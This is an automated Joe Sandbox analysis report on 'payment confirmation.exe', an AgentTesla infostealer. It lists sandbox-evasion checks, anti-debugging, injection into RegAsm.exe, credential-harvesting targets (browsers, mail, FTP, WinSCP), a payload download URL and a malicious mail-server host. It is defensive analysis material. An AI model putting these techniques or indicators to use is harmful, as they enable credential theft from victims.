          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect Any.runShow sources
          Source: C:\Users\user\Desktop\payment confirmation.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\payment confirmation.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: payment confirmation.exe, 00000001.00000002.26442744597.00000000005B4000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEPN[
          Source: RegAsm.exe, 00000007.00000002.30997337103.0000000001250000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1-NGQWW34Y3W8OHKJ32E_9V1PYMXSPN6NWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
          Source: payment confirmation.exe, 00000001.00000002.26442744597.00000000005B4000.00000004.00000020.sdmp, RegAsm.exe, 00000007.00000002.30997337103.0000000001250000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: payment confirmation.exe, 00000001.00000002.26443554674.0000000002BE0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4544Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9940
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0104EA88 sgdt fword ptr [eax]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\payment confirmation.exeSystem information queried: ModuleInformation
          Source: RegAsm.exe, 00000007.00000002.30997337103.0000000001250000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1-NGqww34y3w8ohKj32E_9V1PymXSPn6nwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
          Source: RegAsm.exe, 00000007.00000002.30997435878.0000000001268000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWp/.
          Source: payment confirmation.exe, 00000001.00000002.26442744597.00000000005B4000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exePN[
          Source: payment confirmation.exe, 00000001.00000002.26443554674.0000000002BE0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
          Source: RegAsm.exe, 00000007.00000002.30998131806.00000000012DE000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: payment confirmation.exe, 00000001.00000002.26442744597.00000000005B4000.00000004.00000020.sdmp, RegAsm.exe, 00000007.00000002.30997337103.0000000001250000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\payment confirmation.exeThread information set: HideFromDebugger
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\payment confirmation.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_01046950 LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\payment confirmation.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1100000
          Source: C:\Users\user\Desktop\payment confirmation.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\payment confirmation.exe'
          Source: RegAsm.exe, 00000007.00000002.30999530820.00000000019A1000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: RegAsm.exe, 00000007.00000002.30999530820.00000000019A1000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: RegAsm.exe, 00000007.00000002.30999530820.00000000019A1000.00000002.00020000.sdmpBinary or memory string: Program ManagerX
          Source: RegAsm.exe, 00000007.00000002.30999530820.00000000019A1000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Tries to harvest and steal ftp login credentialsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR

          Remote Access Functionality:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion351Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion351SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          payment confirmation.exe30%VirustotalBrowse
          payment confirmation.exe16%ReversingLabsWin32.Trojan.Mucc

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://DynDns.comDynDNS0%Avira URL Cloudsafe
          http://cps.letsencrypt.org00%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
          http://x1.c.lencr.org/00%Avira URL Cloudsafe
          http://x1.i.lencr.org/00%Avira URL Cloudsafe
          http://mail.pizzascasadelfi.com0%Avira URL Cloudsafe
          http://toAgW8Meo4yo1JT.org0%Avira URL Cloudsafe
          http://r3.o.lencr.org00%Avira URL Cloudsafe
          http://cIypqx.com0%Avira URL Cloudsafe
          http://cps.root-x1.letsencrypt.org00%Avira URL Cloudsafe
          http://r3.i.lencr.org/00%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          mail.pizzascasadelfi.com
          91.197.229.125
          truetrue
            unknown
            drive.google.com
            142.250.185.206
            truefalse
              high
              googlehosted.l.googleusercontent.com
              142.250.74.193
              truefalse
                high
                edge-web.dual-gslb.spotify.com
                35.186.224.25
                truefalse
                  high
                  spclient.wg.spotify.com
                  unknown
                  unknownfalse
                    high
                    doc-08-50-docs.googleusercontent.com
                    unknown
                    unknownfalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://doc-08-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v2kr4nhgnks06n5389380k8fa8p4g3sj/1632756600000/00519186742208262786/*/1-NGqww34y3w8ohKj32E_9V1PymXSPn6n?e=downloadfalse
                        high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://DynDns.comDynDNSRegAsm.exe, 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://doc-08-50-docs.googleusercontent.com/_&3RegAsm.exe, 00000007.00000002.30997838627.00000000012AE000.00000004.00000020.sdmpfalse
                          high
                          http://cps.letsencrypt.org0RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://drive.google.com/RegAsm.exe, 00000007.00000002.30997435878.0000000001268000.00000004.00000020.sdmpfalse
                            high
                            http://x1.c.lencr.org/0RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://x1.i.lencr.org/0RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://doc-08-50-docs.googleusercontent.com/R&RegAsm.exe, 00000007.00000002.30997838627.00000000012AE000.00000004.00000020.sdmpfalse
                              high
                              https://drive.google.com/NSRegAsm.exe, 00000007.00000002.30997435878.0000000001268000.00000004.00000020.sdmpfalse
                                high
                                http://mail.pizzascasadelfi.comRegAsm.exe, 00000007.00000002.31010284622.000000001E203000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://toAgW8Meo4yo1JT.orgRegAsm.exe, 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000003.27330557897.0000000001451000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.31010226667.000000001E1FB000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.31009755976.000000001E1A0000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://r3.o.lencr.org0RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://doc-08-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v2kr4nhgRegAsm.exe, 00000007.00000003.26414612932.00000000012EE000.00000004.00000001.sdmpfalse
                                  high
                                  https://doc-08-50-docs.googleusercontent.com/RegAsm.exe, 00000007.00000003.26414612932.00000000012EE000.00000004.00000001.sdmpfalse
                                    high
                                    http://cIypqx.comRegAsm.exe, 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://cps.root-x1.letsencrypt.org0RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://r3.i.lencr.org/0RegAsm.exe, 00000007.00000002.31016928443.00000000203A5000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.250.185.206
                                    drive.google.comUnited States
                                    15169GOOGLEUSfalse
                                    91.197.229.125
                                    mail.pizzascasadelfi.comUnited Kingdom
                                    29017GYRONGBtrue
                                    142.250.74.193
                                    googlehosted.l.googleusercontent.comUnited States
                                    15169GOOGLEUSfalse

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:1370
                                    Start date:27.09.2021
                                    Start time:17:27:32
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 12m 46s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:payment confirmation.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.spre.troj.spyw.evad.winEXE@4/1@4/3
                                    EGA Information:Failed
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 98%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 20.82.19.171, 20.82.207.122, 20.82.210.154, 40.112.88.60
                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wdcpalt.microsoft.com, ris-prod.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, arc.trafficmanager.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, arc.msn.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    17:30:19API Interceptor2638x Sleep call for process: RegAsm.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    91.197.229.125Funkt.exeGet hashmaliciousBrowse
                                      Funkt.exeGet hashmaliciousBrowse
                                        Notificaci#U00f3n de liquidaci#U00f3n de anticipo.exeGet hashmaliciousBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          mail.pizzascasadelfi.comFunkt.exeGet hashmaliciousBrowse
                                          • 91.197.229.125
                                          Funkt.exeGet hashmaliciousBrowse
                                          • 91.197.229.125
                                          Notificaci#U00f3n de liquidaci#U00f3n de anticipo.exeGet hashmaliciousBrowse
                                          • 91.197.229.125
                                          edge-web.dual-gslb.spotify.comUnreal.exeGet hashmaliciousBrowse
                                          • 35.186.224.25
                                          hVlpEajflR.exeGet hashmaliciousBrowse
                                          • 35.186.224.25

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          GYRONGBFunkt.exeGet hashmaliciousBrowse
                                          • 91.197.229.125
                                          Funkt.exeGet hashmaliciousBrowse
                                          • 91.197.229.125
                                          Notificaci#U00f3n de liquidaci#U00f3n de anticipo.exeGet hashmaliciousBrowse
                                          • 91.197.229.125
                                          3H0zmxCvLZ.exeGet hashmaliciousBrowse
                                          • 91.197.228.158
                                          UW0Lx1YV5l.exeGet hashmaliciousBrowse
                                          • 185.181.116.219
                                          uX24M5IH33.exeGet hashmaliciousBrowse
                                          • 89.145.112.67
                                          QJfoKgzkov.exeGet hashmaliciousBrowse
                                          • 89.145.100.25
                                          dqVPlpmWYt.exeGet hashmaliciousBrowse
                                          • 83.223.99.21
                                          M5Bjwg5t8v.exeGet hashmaliciousBrowse
                                          • 89.145.65.235
                                          5bb870a3b46b0c7d24c0a31b9914718e.exeGet hashmaliciousBrowse
                                          • 91.197.228.158
                                          PL-REM-40310EME02 (0004).htmGet hashmaliciousBrowse
                                          • 91.197.229.197
                                          Purchase Payment PPY029618.htmGet hashmaliciousBrowse
